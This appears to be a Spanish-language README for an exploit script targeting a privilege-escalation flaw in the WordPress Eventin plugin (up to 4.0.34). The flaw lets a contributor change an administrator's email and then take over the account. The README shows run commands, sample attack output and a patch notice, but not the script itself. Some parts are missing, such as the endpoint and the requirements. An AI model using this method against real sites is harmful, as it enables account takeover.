
eventin <= 4.0.34 - escalada de privilegios mediante cambio de correo electrónico del usuario / toma de control de cuenta para contributor+ autenticado
eventin <= 4.0.34 - escalada de privilegios mediante cambio de email de usuario / toma de cuentas para contribuyentes autenticados+
bug de escalada de privilegios en el plugin eventin de WordPress (<= 4.0.34) que permite a cualquier contribuyente o usuario de nivel superior cambiar el email de cualquier usuario a través de la API de actualización de ponentes del plugin. Al cambiar el email de un administrador a uno controlado por el atacante, éste puede restablecer la contraseña y tomar el control de la cuenta.
eventin\speaker\api\speakercontroller::update_item)eventin no comprueba adecuadamente quién solicita la actualización ni si está autorizado para cambiar el email del usuario. Un contribuyente o superior puede llamar a este endpoint:
requisitos:
instalar requests:
pip install requests
ejecuta el script e introduce los valores solicitados:
python3 CVE-2025-4796.py
[+] desactivando advertencias de verificación ssl
[+] iniciando sesión en wordpress.
[+] inicio de sesión exitoso.
[+] obteniendo token nonce
[+] token nonce encontrado: abcdef1234567890
[+] solicitud de actualización del email del ponente
[+] operación de actualización exitosa.
url: http://example.com
id: 123
email: [email protected].
user: attacker
pass: yourpassword
{.
"id": 123,
"email": "[email protected]",
"name": "Speaker Name",
...
}.
se ha publicado un parche en la versión 4.0.35 del plugin eventin. Se recomienda encarecidamente a los administradores del sitio que actualicen a esta versión de inmediato. La corrección incluye validaciones adicionales de usuario en la función SpeakerController::update_item